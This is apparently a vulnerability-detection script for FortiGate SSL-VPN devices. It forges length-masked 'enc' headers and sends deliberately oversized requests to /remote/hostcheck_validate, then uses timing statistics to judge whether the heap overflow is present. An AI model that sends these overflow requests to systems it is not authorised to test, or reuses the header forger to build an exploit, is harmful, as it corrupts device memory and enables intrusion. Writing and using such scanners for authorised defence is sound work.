#!/usr/bin/env python3
import hashlib
import os
import re
import struct
import sys

import numpy as np
import requests
import urllib3
from scipy.stats import ttest_ind
from urllib3.exceptions import InsecureRequestWarning
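# Every request in this script is sent with verify=False, so silence the
# per-request InsecureRequestWarning once at import time. Call urllib3
# directly: ``requests.packages.urllib3`` is only a compatibility alias.
urllib3.disable_warnings(category=InsecureRequestWarning)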
# Upper bound per group: up to 400 requests with a valid length and up to 400
# with an oversized length. check_target re-tests every 10th round and breaks
# out as soon as the difference is statistically significant, so most runs
# finish long before this bound is reached.
REQUESTS_PER_GROUP = 400
def gen_enc_hdr(salt, l):
    """Build the 12-hex-digit ``enc`` header used by make_req.

    A keystream is derived as MD5(salt || "00bfbfbf" || magic); its first two
    bytes are XORed over the little-endian 16-bit length ``l``. The result is
    the fixed "00bfbfbf" prefix followed by the two masked length bytes as
    lowercase hex.

    Args:
        salt: Device salt as bytes (the 8 hex characters read from /remote/info).
        l: Length to encode; must fit in an unsigned 16-bit field.

    Returns:
        A 12-character lowercase hex string.

    Raises:
        struct.error: if ``l`` does not fit in 16 bits.
    """
    fixed_prefix = b"00bfbfbf"
    magic = b"GCC is the GNU Compiler Collection."
    keystream = hashlib.md5(salt + fixed_prefix + magic).digest()
    le_len = struct.pack("<H", l)
    masked = bytes(a ^ b for a, b in zip(le_len, keystream[:2]))
    return fixed_prefix.decode() + masked.hex()
def make_req(session, baseurl, salt, allocsize, reqsize):
    """POST one /remote/hostcheck_validate request and return the Response.

    The ``enc`` form field is the header from gen_enc_hdr(salt, reqsize)
    followed by ``allocsize`` bytes of 0x41 written as hex. TLS certificate
    verification is disabled (verify=False), matching the GET in check_target.

    Args:
        session: requests.Session used for connection reuse.
        baseurl: "https://host:port" without a trailing slash.
        salt: Device salt as bytes.
        allocsize: Number of payload bytes appended after the header.
        reqsize: Length value encoded into the header.

    Returns:
        The requests.Response for the POST.
    """
    enc_value = gen_enc_hdr(salt, reqsize) + "41" * allocsize
    form_body = "ajax=1&username=test&realm=&enc=" + enc_value
    endpoint = baseurl + "/remote/hostcheck_validate"
    return session.post(
        endpoint,
        headers={"content-type": "application/x-www-form-urlencoded"},
        verify=False,
        data=form_body,
    )
def reject_outliers(data):
    """Drop latency samples above the third quartile of *data*.

    Roughly the slowest 25% of responses are discarded so that random latency
    spikes do not dominate the t-test. Surviving values are returned as a list
    in their original order.

    Args:
        data: Non-empty sequence of numeric samples.

    Returns:
        list of the samples that are <= the 0.75 quantile.
    """
    upper_fence = np.quantile(data, 0.75)
    return [sample for sample in data if sample <= upper_fence]
def check_stats(regular, overflow):
    """Trim both latency groups and run Welch's t-test between them.

    Each group is passed through reject_outliers, then ``ttest_ind`` is run
    with ``equal_var=False`` (Welch's test) as overflow vs. regular.

    Args:
        regular: Latency samples for the regular-length requests.
        overflow: Latency samples for the oversized-length requests.

    Returns:
        ``(len(trimmed_overflow), len(trimmed_regular), result)`` where
        ``result`` is the scipy test result exposing ``statistic`` and
        ``pvalue``. Note the count order is overflow first, then regular.
    """
    trimmed_overflow, trimmed_regular = (
        reject_outliers(group) for group in (overflow, regular)
    )
    welch = ttest_ind(trimmed_overflow, trimmed_regular, equal_var=False)
    return len(trimmed_overflow), len(trimmed_regular), welch
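def check_target(baseurl):
    """Time two request groups against a FortiGate SSL-VPN and classify the host.

    Reads the per-device salt from /remote/info, then alternates an "overflow"
    request (header length alloc_size + 0xF0) with a "regular" one (header
    length alloc_size // 2), recording each response's latency in
    microseconds. Every 10th round after the first 20, the trimmed groups are
    compared with check_stats and the loop stops early once both trimmed
    groups still hold more than 20 samples and p < 0.001.

    Args:
        baseurl: "https://host:port" without a trailing slash.

    Returns:
        "Vulnerable" when the overflow group is significantly slower
        (t-statistic > 0.5), "Patched" when it is faster (< -0.5), "Unknown"
        in between, or an "ERROR: ..." string when exactly one salt is not
        found in /remote/info. A low-confidence warning is printed when
        p > 0.001 or |t| < 2.

    Raises:
        requests.RequestException: on connection failure or when the initial
            GET exceeds its timeout.
    """

    def _elapsed_us(resp):
        # Whole request duration in microseconds. ``elapsed.microseconds`` is
        # only the sub-second field of the timedelta and wraps for any response
        # slower than one second, which would corrupt the samples.
        return round(resp.elapsed.total_seconds() * 1e6)

    # Bounded wait so a silent host cannot hang the check indefinitely.
    r = requests.get(baseurl + "/remote/info", verify=False, timeout=30)
    salt_re = re.compile(r"salt='([0-9a-f]{8})'")
    matches = salt_re.findall(r.text)
    if len(matches) != 1:
        return "ERROR: not FortiGate ssl vpn?"
    salt = matches[0].encode()
    # allocations of size 0xe000+1-0x10000 are all in the same size class
    # we leave a 2KiB gap after our allocation but before the next chunk, so vulnerable devices will only corrupt unused memory
    alloc_size = 0xF800
    overflow = []
    regular = []
    # Session as a context manager so pooled connections are released on exit.
    with requests.Session() as s:
        for i in range(REQUESTS_PER_GROUP):
            r1 = make_req(s, baseurl, salt, alloc_size, alloc_size + 0xF0)
            overflow.append(_elapsed_us(r1))
            r2 = make_req(s, baseurl, salt, alloc_size, alloc_size // 2)
            regular.append(_elapsed_us(r2))
            if i > 20 and i % 10 == 0:
                # check_stats returns (len(overflow), len(regular), result);
                # the names here follow that order.
                n_overflow, n_regular, t = check_stats(regular, overflow)
                if n_overflow > 20 and n_regular > 20 and t.pvalue < 0.001:
                    break
    _, _, t_stat = check_stats(regular, overflow)
    if t_stat.pvalue > 0.001 or (-2 < t_stat.statistic < 2):
        print("WARNING: Low confidence results.")
    # ttest_ind(overflow, regular): a positive statistic means the overflow
    # group's mean latency is higher than the regular group's.
    if t_stat.statistic < -0.5:
        return "Patched"
    elif t_stat.statistic > 0.5:
        return "Vulnerable"
    else:
        return "Unknown"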
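if __name__ == "__main__":
    # Usage: <script> <IP> <PORT>; the two positional arguments form the base URL.
    if len(sys.argv) < 3:
        print("Usage: detect {} <IP> <PORT>".format(os.path.basename(__file__)))
        # sys.exit rather than the site-provided exit(); non-zero so callers
        # and wrapper scripts can tell a usage error from a completed check.
        sys.exit(1)
    baseurl = "https://{}:{}".format(sys.argv[1], sys.argv[2])
    print("Checking " + baseurl)
    print(check_target(baseurl))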